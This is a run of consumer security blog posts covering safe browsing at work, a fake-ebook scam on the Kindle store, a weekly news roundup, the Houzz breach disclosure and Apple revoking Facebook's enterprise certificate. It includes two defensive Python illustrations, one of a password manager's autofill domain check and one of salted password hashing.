Refrain from visiting sites that your colleagues or boss would frown upon if they look over your shoulder. Most employees know that visiting and navigating to sites that are not safe for work (NSFW) is a no-no, but they still do it. Trouble is, not only does this welcome malware and other threats that target visitors of such sites, but it could also result in being—rightfully or not—accused of sexual harassment. Browsing sites of a pornographic nature could make coworkers incredibly uncomfortable, and if this behavior is generally tolerated by the brass, it could result in the company becoming the subject of a hostile environment claim. So if hackers don’t scare you, maybe a lawsuit will.

Use a password manager. It may sound like this advice is out of place, but we include it for a reason. Password managers don’t just store a multitude of passwords and keep them safe. They also refuse to auto-fill fields on seemingly legitimate, but ultimately malicious sites whose address doesn’t match the site the credentials were saved for, making them an unlikely protector against phishing attempts. So the next time you receive an email from your “bank” telling you there’s a breach and you have to update your password, and your password manager refuses to pre-fill that information, scrutinize the URL in the address bar carefully. You might be on a site you don’t want to be on.

Read: Why you don’t need 27 different passwords
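The check that makes a password manager refuse to fill a look-alike site is an origin comparison: the vault entry is tied to the registrable domain it was saved on, and the manager fills only when the current page is served over HTTPS from that same domain. The following is an added illustration of that decision logic, not code from Malwarebytes or from any particular password manager. The vault contents, the tiny stand-in for the Public Suffix List, and the hostnames are all constructed for the demo.

```python
from urllib.parse import urlsplit

# Constructed vault: each entry is keyed by the registrable domain (eTLD+1)
# of the site the credential was saved on. The values are sample data.
VAULT = {
    "bank.example": {"username": "alice", "password": "correct-horse-battery"},
}

# Stand-in for the Public Suffix List (assumption: a real password manager
# ships the full list from publicsuffix.org; this toy set only serves the demo).
PUBLIC_SUFFIXES = {"com", "net", "org", "example", "co.uk", "uk"}


def registrable_domain(host):
    """Return the eTLD+1 of a hostname, or None if it has no registrable part."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            # The host is itself a public suffix: nothing to match against.
            return None if i == 0 else ".".join(labels[i - 1:])
    return None  # unknown suffix: refuse rather than guess


def autofill_decision(page_url):
    """Decide whether the vault may fill a login form on page_url.

    Returns (credential_or_None, reason). Every refusal carries a reason so
    a user (or a support engineer) can see why the manager stayed silent.
    """
    parts = urlsplit(page_url)
    if parts.scheme != "https":
        return None, "refused: credentials are only filled over HTTPS"
    host = parts.hostname or ""
    try:
        host.encode("ascii")
    except UnicodeEncodeError:
        # Look-alike (homograph) hostnames never match an ASCII vault key.
        return None, f"refused: non-ASCII hostname {host!r}"
    domain = registrable_domain(host)
    if domain is None:
        return None, f"refused: no registrable domain in {host!r}"
    cred = VAULT.get(domain)
    if cred is None:
        # A subdomain of the attacker's domain that merely *starts* with
        # "bank.example" lands here, because its eTLD+1 is the attacker's.
        return None, f"refused: no saved login for {domain!r}"
    return cred, f"filled: {host!r} belongs to {domain!r}"


if __name__ == "__main__":
    for url in (
        "https://www.bank.example/login",
        "https://login.bank.example/",
        "https://bank.example.evil-site.com/login",
        "http://bank.example/login",
        "https://bank-example.com/login",
        "https://b\u0430nk.example/login",  # Cyrillic "а" in place of Latin "a"
    ):
        cred, reason = autofill_decision(url)
        print(f"{url:45} -> {reason}")
```

The interesting cases are the refusals: a page on a subdomain of the attacker's own domain, a plain-HTTP copy of the real site, a hyphenated look-alike, and a homograph hostname all fail the comparison, while a legitimate subdomain of the saved site still fills.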

Consider installing apps that act as another layer of protection. There is a trove of fantastic browser apps out there that a privacy- and security-conscious employee can greatly benefit from. Ad blockers, for instance, can strip out ads on sites that have been used by malicious actors before in malvertising campaigns. Tracker blockers allow one to block trackers on sites that monitor their behavior and gather information about them without their consent. Script blockers disable or prevent the execution of browser scripts, which criminals can misuse. Other apps, such as HTTPS Everywhere, force one’s browser to direct users to available HTTPS versions of websites.

Consider sandboxing. A sandbox is software that emulates an environment where one can browse the Internet and run programs independently from the actual endpoint. It’s typically used for testing and analyzing files to check if they’re safe to deploy and run.

We’re not saying that employees should know how to analyze files (although kudos if you can). We only mean that employees who open attachments from their personal emails, stumble into sites that may be deemed sketchy at best, or want to check out programs from third-party vendors should do so in a safe setup that is isolated from their office network. Here is a list of free sandbox software you can read more about if you’re interested in trying one out.

Assume you are a target. Not many employees would like to admit this. In fact, it may not have crossed their minds until now. A lot of small businesses, for example, would like to think that they cannot be targets of cyberattacks because criminals wouldn’t go after “the little guy.” But various surveys, intelligence, and research tell a different story.

Employees need to change their thinking. Each time we go online at work, whether for valid reasons or not, we are putting our companies at risk. So we must take the initiative to browse safely, adopt cybersecurity best practices, and embrace training sessions with open minds. Realize that a lot is at stake in the office environment, and a single mouse click on a bad link could bring down an entire business. Do you want to be the person responsible?

We’re all in this together

When it comes to preventing online threats from infiltrating your organization’s network and keeping sensitive company and client data secure, it is true that they are no longer just IT concerns. Cybersecurity and privacy are and should be every employee’s concern—from the rank-and-file up to the managerial and executive level.

Indeed, no one should be exempted from continuous cybersecurity training, nor should high-ranking officials go on thinking that company policies don’t apply to them. If every employee can adhere to the simple guideline above, we believe that organizations of all sizes are already in a better security posture than before. This is just the first step, however. There is still the need for organizations to assess their cybersecurity and privacy needs, so they can effectively invest in tools and services that help better secure their unique work environment. Whatever changes they choose to implement that require employee participation, IT and high-ranking officials must ensure that everyone is in it together.

Stay safe!


The post How to browse the Internet safely at work appeared first on Malwarebytes Labs.


Movie stream ebooks gun for John Wick 3 on Kindle store

Malware Bytes Security - Mon, 02/04/2019 - 12:30pm

We discovered a novel spam campaign over the weekend, targeting fans of John Wick on the Amazon Kindle store. The scam involves paying for what appears to be the upcoming third movie, which turns out to be a bogus ebook that hyperlinks potential victims to a collection of third-party websites.

How does this begin?

With a dog, a grieving assassin, and a pencil.

Actually, it begins with me hunting for John Wick graphic novels on the Kindle store. What I found isn’t exactly hidden from view—as you can see from the screenshots, the bogus results kick in right under the second genuine entry:


What are we looking at here?

Roughly 40 or more individual items uploaded from around January 25 to February 2, each one from a different “author.” At first glance, you might think you’re looking at movies, thanks to the play button icon on each image preview. The fact that each entry is called something along the lines of “John Wick 3: free movie HD” probably helps, too.


All of the items are on sale for a variety of prices including £0.99 each, £9.93, £12.19, and up to an astonishing £15.25 (roughly $20 USD). A few of them are listed as free, and all of them have a preview available.


At this point, someone seeing this may think they’re actually buying a copy of John Wick 3. This is where it gets interesting.

This isn’t John Wick 3, is it?

Correct, it absolutely is not John Wick 3. What we have here is an incredibly basic ebook with a “play movie” image bolted onto the preview. Opening up the preview gives us a slice of “coming soon” style text for the movie, due out in May.

The text reads as follows, and appears to be the same content used in each ebook:

John Wick: Chapter 3 – Parabellum 

When we last observed John Wick, he wasn’t in the best shape as he’d quite recently had a worldwide contract hit put out on him toward the finish of John Wick: Chapter 2.  

So most would agree that the third motion picture in the hit activity establishment, driven by Keanu Reeves, won’t be a steady walk around the recreation center. Indeed, even the full title, John Wick: Chapter 3 – Parabellum, insights at the massacre in store as Reeves clarified recently.

“[It means] get ready for war. It’s a piece of that popular sentence, ‘Si vis pacem, para bellum’ which interprets as, ‘On the off chance that you need harmony, get ready for war’,” he laid out. All things considered, Wick said he’d “execute them all” toward the finish of Chapter 2.

Looking at the “Click here” text isn’t useful on a mobile device, because in practice I couldn’t get it to recognise my clicks. I also couldn’t figure out what the clickable link was from looking at it on the mobile, either. With that in mind, it was time to port over to a desktop and fire up an appropriate reader.

A quick port to a desktop reader later, and we now have a fully clickable link:


Where does the link go?

It takes would-be Wick watchers to:


Which is a portal that claims to offer up multiple movies:


The movie we’re interested in here is John Wick 3:


No matter what you do at this point, the only option here is “be forwarded to another site” via the register button: 


Our tour of the movie world upside-down now takes us to:



This style of site may be familiar to regular readers. They typically claim to offer all sorts of media content and claim free sign ups, but there’s usually a rolling charge or fees somewhere in the mix. The site says the following:

You agree that, on registration for a Membership, you authorise us to place a pre-authorisation hold (between USD $1.00 to 2.00) on your Payment Card to validate your billing address and other Payment Card information.

Depending on your region, you may find yourself sent to similar sites like:



However, there is no further information in the T&C or Privacy Policy for either site that states exactly what sort of payment is (or isn’t) expected after signing up. One thing is for certain: Someone wasting up to £15 on a bogus ebook then bouncing from site to site isn’t going to end up with a legitimate version of John Wick 3.

Don’t set him off

It’s tricky to flag dubious content on the Kindle store, as you have to report each title individually and give reasons. We contacted Amazon customer support and have been informed these ebooks have been escalated to the appropriate teams.

Amazon has had problems with fake ebooks before, though those were in the business of swiping authors’ content and making as much money as possible before being shut down. What we have here are worthless ebooks with no content, save for clickthrough links to streaming portals. At time of writing, the ebooks we discovered are still available for purchase.

If you’re on the hunt for John Wick, the lesson is clear: don’t bring an ebook to a gunfight.

The post Movie stream ebooks gun for John Wick 3 on Kindle store appeared first on Malwarebytes Labs.


A week in security (January 28 – February 3)

Malware Bytes Security - Mon, 02/04/2019 - 12:00pm

Last week, we ran another entry in our interview with a malware hunter series, explained a FaceTime vulnerability, and took a deep dive into a new stealer. We also threw some light on a Houzz data breach, and on what exactly happened between Apple and Facebook.

Other cybersecurity news
  • Kwik Fit hit by malware: Car service specialist runs into trouble when systems go offline. (Source: BBC)
  • Mozilla publishes tracking policy: Mozilla fleshes out their vision of what is and isn’t acceptable in tracking land. (Source: Mozilla)
  • Distracting smart speakers: How you can effectively drown out your smart speaker with a bit of distraction. (Source: The Register)
  • Privacy attack aimed at 3/4/5G users: Theoretical fake mobile towers are back in business, with an investment in monitoring device owner activities. (Source: Help Net Security)
  • How my Instagram was hacked: A good warning about the perils of password reuse. (Source: Naked Security)
  • Social media identity thieves: Scammers will stop at nothing to pull some heartstrings and make a little money in the bargain. (Source: ABC news)
  • Another smart home hacked: A family recounts their horror at seeing portions of their home cut open for someone’s amusement. (Source: Komando)
  • Facebook mashup: Plans to combine Whatsapp, Instagram, and Facebook Messenger are revealed with security questions raised. (Source: New York Times)
  • Phishing attacks continue to rise: Worrying stats via security experts polled who agree in large numbers that phishing is at the same level or higher than it was previously. (Source: Mashable)
  • Researchers discover malware-friendly hosting service: After a spike in infections, researchers track things back to a host that looked like a “hornet’s nest of malware.” (Source: TechCrunch)

Stay safe, everyone!

The post A week in security (January 28 – February 3) appeared first on Malwarebytes Labs.


Houzz data breach: Why informing your customers is the right call

Malware Bytes Security - Fri, 02/01/2019 - 1:00pm

Houzz is an online platform dedicated to home renovation and design. Today (February 1, 2019), they notified their customers about a data breach that reportedly happened in December 2018.

Data breaches unfortunately have become a common event. In fact, we dubbed 2018 the year of the data breach tsunami. Also, Houzz is not a giant corporation with millions of customers. So why are we writing about this, you may ask? Mainly because we feel there are some giant corporations out there who can learn from this event as an example of how to handle a data breach properly.


Discovering and informing your customers about a breach that happened less than two months ago is a lot better than what we have seen recently. They did not wait until the investigation into how the breach happened was finished. As soon as they knew what was stolen, they decided to inform those concerned. Of course, it is imperative to get this information into your customers’ hands as soon as possible, which is probably why the investigation is being conducted by a leading forensics firm. Law enforcement has been notified as well.

Informing customers

Houzz informed their customers directly by email, as well as on their website, about the breach. They said:

Houzz recently learned that a file containing some of our user data was obtained by an unauthorized third party.

The mail starts with this disclosure, goes on to explain what happened, and which information was stolen. It also contains a link to their website, where you can find more information.

The information given is concise and precise, not just some general remark that no financial information was stolen (which, thankfully, was indeed the case). Houzz included a list of the information that was stolen.

The following types of information could have been impacted by this incident:

  • Certain publicly visible information from a user’s Houzz profile only if the user made this information publicly available (e.g., first name, last name, city, state, country, profile description)
  • Certain internal identifiers and fields that have no discernible meaning to anyone outside of Houzz (e.g. country of site used, whether a user has a profile image)
  • Certain internal account information (e.g., user ID, prior Houzz usernames, one-way encrypted passwords salted uniquely per user, IP address, and city and ZIP code inferred from IP address) and certain publicly available account information (e.g., current Houzz username and if a user logs into Houzz through Facebook, the user’s public Facebook ID)

Importantly, this incident does not involve Social Security numbers or payment card, bank account, or other financial information.

On the website, customers can find detailed information on how to change their password. And, as we have done in the past, they advise their customers to use a unique password for each service, which does not need to be as big a hassle as you might expect.


Houzz announced security improvements without going into detail. While customers might find this vague, it makes sense to withhold the specifics, as the investigation is ongoing, and they wouldn’t want to make threat actors any wiser. Seeing that they were already using one-way encrypted passwords salted uniquely per user was certainly encouraging.
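“One-way encrypted passwords salted uniquely per user” means that each user’s password is run through a one-way function together with a random salt that is stored beside the result, so two users with the same password end up with different stored values and a leaked table cannot be attacked with a single precomputed lookup. The following is an added illustration of that scheme, not Houzz’s code (Houzz did not disclose which algorithm it uses); PBKDF2-HMAC-SHA256 from the Python standard library is assumed here, and the usernames and passwords are constructed sample data.

```python
import base64
import hashlib
import hmac
import os

# Assumption: iteration count for the demo. Production deployments tune this
# upward to the slowest value the login path can tolerate on their hardware.
ITERATIONS = 200_000
SALT_BYTES = 16


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def _unb64(text):
    return base64.b64decode(text.encode("ascii"))


def hash_password(password, salt=None):
    """Return a self-describing record 'pbkdf2_sha256$iters$salt$digest'.

    A fresh random salt is drawn for every call, so the same password
    hashed twice (for two users, or for one user twice) never repeats.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256${}${}${}".format(ITERATIONS, _b64(salt), _b64(digest))


def verify_password(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        algo, iters, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt, expected = _unb64(salt_b64), _unb64(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    # hmac.compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(candidate, expected)


def demo():
    """Constructed user table: two users who happen to share a password."""
    users = {
        "alice": hash_password("hunter2"),
        "bob": hash_password("hunter2"),
    }
    salts_differ = users["alice"] != users["bob"]
    return (
        salts_differ,                                  # per-user salt in action
        verify_password("hunter2", users["alice"]),    # correct password
        verify_password("hunter3", users["alice"]),    # wrong password
    )


if __name__ == "__main__":
    print(demo())
```

The record is self-describing (algorithm, iteration count, salt, digest), which is what lets a site raise the iteration count later and transparently re-hash each user at their next successful login; the salt is not a secret and is stored in the clear next to the digest.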

Dealing with data breaches

Data breaches happen all the time. They happen to the best of companies. It’s the way those organizations deal with them that can save face. What other businesses can take away from this example:

  • Inform customers as soon as it makes sense and be precise about the stolen information.
  • Approach your customers directly. Don’t let them read about it in the papers or social media.
  • Engage law enforcement and a firm specialized in forensic investigations.
  • Learn from what went wrong and improve on that.

Stay safe, everyone!

The post Houzz data breach: Why informing your customers is the right call appeared first on Malwarebytes Labs.


Apple pulls Facebook enterprise certificate

Malware Bytes Security - Thu, 01/31/2019 - 11:44am

It’s been an astonishing few days for Facebook. They’ve seen both an app and their enterprise certificate removed and revoked with big consequences.

What happened?

Apple issues enterprise certificates to organizations so that they can create and sign internal apps. Those apps don’t end up released on the Apple store, because the terms of service don’t allow it. Anything storefront-bound must go through Apple’s mandatory app review before being loaded up for sale.

What went wrong?

Facebook put together a “Facebook Research” market research app using the internal process. However, they then went on to distribute it externally to non-Facebook employees. And by “non-Facebook employees” we mean “people between the ages of 13 and 35.” In return for access to large swathes of user data, the participants received monthly $20 gift cards.

The program was managed via various Beta testing services, and within hours of news breaking, Facebook stated they’d pulled the app.

Problem solved?

Not exactly. Apple has, in fact, revoked Facebook’s certificate, essentially breaking all of their internal apps and causing major disruptions for their 33,000 or so employees in the process. As per the Apple statement:

We designed our Enterprise Developer Program solely for the internal distribution of apps within an organization. Facebook has been using their membership to distribute a data-collecting app to consumers…a clear breach of their agreement.


Yes, whoops. Now the race is on to get things back up and running over at Facebook HQ. Things may be a little tense behind the scenes due to, uh, something similar involving a VPN-themed app collecting data it shouldn’t have been earlier this year. That one didn’t use the developer certificate, but it took some 33 million downloads before Apple noticed and decided to pull the plug.

Could things get any worse for Facebook?

Cue Senator Ed Markey, with a statement on this particular subject:

“It is inherently manipulative to offer teens money in exchange for their personal information when younger users don’t have a clear understanding of how much data they’re handing over and how sensitive it is,” said Senator Markey. “I strongly urge Facebook to immediately cease its recruitment of teens for its Research Program and explicitly prohibit minors from participating. Congress also needs to pass legislation that updates children’s online privacy rules for the 21st century. I will be reintroducing my ‘Do Not Track Kids Act’ to update the Children’s Online Privacy Protection Act by instituting key privacy safeguards for teens.

But my concerns also extend to adult users. I am alarmed by reports that Facebook is not providing participants with complete information about the extent of the information that the company can access through this program. Consumers deserve simple and clear explanations of what data is being collected and how it being used.

Well, that definitely sounds like a slide towards “worse” instead of “better.”

A one-two punch?

Facebook is already drawing heavy criticism this past week for the wonderfully-named “friendly fraud” practice of kids making dubious purchases, and chargebacks being made. It happens, sure, but perhaps not quite like this. From the linked Register article:

Facebook, according to the full lawsuit, was encouraging game devs to build Facebook-hosted games that allowed children to input parents’ credit card details, save those details, and then bill over and over without further authorisation.

While large amounts of money were being spent, some refunds proved to be problematic. Employees were querying why most apps with child-related issues are “defaulting to the highest-cost setting in the purchase flows.” You’d better believe there may be further issues worth addressing.

What next?

The Facebook research program app will continue to run on Android, which is unaffected by the certificate antics. There’s also this app from Google in Apple land which has since been pulled due to also operating under Apple’s developer enterprise program. No word yet as to whether or not Apple will revoke Google’s certificate, too. It could be a bumpy few days for some organizations as we wait to see what Apple does next. Facebook, too, could certainly do with a lot less bad publicity as it struggles to regain positive momentum. Whether that happens or not remains to be seen.

The post Apple pulls Facebook enterprise certificate appeared first on Malwarebytes Labs.
